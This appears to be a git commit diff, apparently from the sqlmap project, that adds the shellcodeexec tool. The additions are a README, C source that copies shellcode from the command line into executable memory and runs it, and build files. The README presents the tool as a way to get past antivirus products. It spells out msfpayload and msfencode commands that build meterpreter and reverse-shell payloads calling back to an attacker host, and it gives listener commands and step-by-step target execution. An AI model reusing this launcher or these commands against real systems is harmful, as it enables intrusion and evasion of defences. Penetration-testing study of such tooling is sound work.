Major recode of --os-pwn functionality. Now the Metasploit shellcode can not be run as a Metasploit generated payload stager anymore. Instead it can be run on the target system either via sys_bineval() (as it was before, anti-forensics mode, all the same) or via shellcodeexec executable. Advantages are that:

* It is stealthier as the shellcode itself does not touch the filesystem, it's an argument passed to shellcodeexec at runtime. * shellcodeexec is not (yet) recognized as malicious by any (Avast excluded) AV product. * shellcodeexec binary size is significantly smaller than a Metasploit payload stager (even when packed with UPX). * UPX now is not needed anymore, so sqlmap package is also way smaller and less likely to be detected itself as malicious by your AV software. shellcodeexec source code, compilation files and binaries are in extra/shellcodeexec/ folder now - copied over from https://github.com/inquisb/shellcodeexec. Minor code refactoring.
2025-12-26 01:19:04 +00:00 · 2011-04-24 23:01:21 +00:00
parent d0a534dee5
commit e35f25b2cb
24 changed files with 722 additions and 1426 deletions
--- a/extra/shellcodeexec/README
+++ b/extra/shellcodeexec/README
@@ -0,0 +1,126 @@
+= Short description =
+
+shellcodeexec is a small script to execute in memory a sequence of opcodes.
+
+
+= Background =
+
+Most of the shellcode launchers out there, including proof of concepts 
+part of many "security" books, detail how to allocate a memory page as
+readable/writable/executable on POSIX systems, copy over your shellcode
+and execute it. This works just fine. However, it is limited to POSIX,
+does not necessarily consider 64-bit architecture and Windows systems.
+
+
+= Description =
+
+This script and the relevant project files (Makefile and Visual Studio
+files) allow you to compile the tool once then run your shellcode across
+different architectures and operating systems.
+
+Moreover, it solves a common real world issue: the target system's anti
+virus software blocking a Metasploit-generated payload stager (either EXE
+of ELF). Take for instance the following command line:
+
+    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
+
+This generates a Metasploit payload stager, payload.exe, that as soon as
+it lands on the AV-protected target system is recognized as malicious and
+potentially blocked (depending on the on-access scan settings) by many
+anti virus products. At the time of writing this text, 21 out 41 anti
+viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
+multiple times with msfencode, less AV softwares detect it, still a lot.
+
+I have been surfing the Net and found some interesting tutorials and
+guides about packing, compressing, obfuscating and applying IDA-foo to
+portable executables et similar in order to narrow down the number of AV
+products that can detect it as a malicious file. This is all interesting,
+but does not stop few hard-to-die anti viruses to detect your backdoor.
+
+So the question is, how cool would it be to have a final solution to avoid
+all this hassle? This is exactly where this tool comes into play!
+
+
+= Features =
+
+shellcodeexec:
+
+* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
+
+* Can be compiled and works on 32-bit and 64-bit architectures.
+
+* As far as I know, no AV detect it as malicious.
+
+* Works in DEP/NX-enabled environments: it allocates the memory page where
+  it stores the shellcode as +rwx - Readable Writable and eXecutable.
+
+* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
+  shellcode (generated for instance with Metasploit's msfpayload) to
+  Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
+  BufferRegister variable to EAX registry where the address in memory of
+  the shellcode will be stored, to avoid get_pc() binary stub to be
+  prepended to the shellcode.
+
+* Spawns a new thread where the shellcode is executed in a structure
+  exception handler (SEH) so that if you wrap shellcodeexec into your own
+  executable, it avoids the whole process to crash in case of unexpected
+  behaviours.
+
+
+= HowTo =
+
+1. Generate a Metasploit shellcode and encode it with the alphanumeric
+   encoder. For example for a Linux target:
+
+    $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+
+   Or for a Windows target:
+
+    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+
+
+2. Execute the Metasploit multi/handler listener on your machine. For
+   example for a Linux target:
+
+    $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
+
+   Or for a Windows target:
+
+    $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
+
+
+3. Execute the alphanumeric-encoded shellcode with this tool. For example
+   on the Linux target:
+
+    $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
+
+   Or, on the Windows target:
+
+    C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
+
+
+= License =
+
+This source code is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+
+
+= Author =
+
+Bernardo Damele A. G. <bernardo.damele@gmail.com>
+
+
+= Homepage =
+
+https://github.com/inquisb/shellcodeexec
--- a/extra/shellcodeexec/linux/Makefile
+++ b/extra/shellcodeexec/linux/Makefile
@@ -0,0 +1,7 @@
+32:
+	gcc -Wall -Os shellcodeexec.c -o shellcodeexec
+	strip -sx shellcodeexec
+
+64:
+	gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
+	strip -sx shellcodeexec
--- a/extra/shellcodeexec/linux/shellcodeexec.c
+++ b/extra/shellcodeexec/linux/shellcodeexec.c
@@ -0,0 +1,138 @@
+/*
+	shellcodeexec - Script to execute in memory a sequence of opcodes
+	Copyright (C) 2011  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com
+	email: bernardo.damele@gmail.com
+	
+	This source code is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#include <sys/types.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#include <windows.h>
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#else
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+int sys_bineval(char *argv);
+
+int main(int argc, char *argv[])
+{
+	if (argc < 2) {
+		printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
+		exit(-1);
+	}
+
+	sys_bineval(argv[1]);
+
+	exit(0);
+}
+
+int sys_bineval(char *argv)
+{
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	len = (size_t)strlen(argv);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+	// copy over the shellcode
+	strncpy(code, argv, len);
+
+	// execute it by ASM code defined in exec_payload function
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);	// align to page boundary
+
+		// mmap an +rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		// copy over the shellcode
+		strncpy((char *)addr, argv, len);
+
+		// execute it
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN64)
+void __exec_payload(LPVOID);
+
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__exec_payload(lpParameter);
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#endif
--- a/extra/shellcodeexec/linux/shellcodeexec.x32
+++ b/extra/shellcodeexec/linux/shellcodeexec.x32
--- a/extra/shellcodeexec/linux/shellcodeexec.x64
+++ b/extra/shellcodeexec/linux/shellcodeexec.x64
--- a/extra/shellcodeexec/windows/README
+++ b/extra/shellcodeexec/windows/README
@@ -0,0 +1,25 @@
+Before compiling, an enviroment variable has to be set.
+
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+
+
+Procedure for setting environment variables on Windows:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+
+Sample value:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+
+
+Notes:
+
+To get as small portable executable as possible compile as follows:
+* Use Visual C++ 2005
+* Strip the executable with UPX
--- a/extra/shellcodeexec/windows/shellcodeexec.sln
+++ b/extra/shellcodeexec/windows/shellcodeexec.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeexec", "shellcodeexec\shellcodeexec.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/shellcodeexec/windows/shellcodeexec.x32.exe
+++ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe
--- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
+++ b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
@@ -0,0 +1,138 @@
+/*
+	shellcodeexec - Script to execute in memory a sequence of opcodes
+	Copyright (C) 2011  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com
+	email: bernardo.damele@gmail.com
+	
+	This source code is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#include <sys/types.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#include <windows.h>
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#else
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+int sys_bineval(char *argv);
+
+int main(int argc, char *argv[])
+{
+	if (argc < 2) {
+		printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
+		exit(-1);
+	}
+
+	sys_bineval(argv[1]);
+
+	exit(0);
+}
+
+int sys_bineval(char *argv)
+{
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	len = (size_t)strlen(argv);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+	// copy over the shellcode
+	strncpy(code, argv, len);
+
+	// execute it by ASM code defined in exec_payload function
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);	// align to page boundary
+
+		// mmap an +rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		// copy over the shellcode
+		strncpy((char *)addr, argv, len);
+
+		// execute it
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN64)
+void __exec_payload(LPVOID);
+
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__exec_payload(lpParameter);
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+	}
+
+	return 0;
+}
+#endif
--- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj
+++ b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj
@@ -0,0 +1,195 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8.00"
+	Name="shellcodeexec"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="shellcodeexec"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\shellcodeexec.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>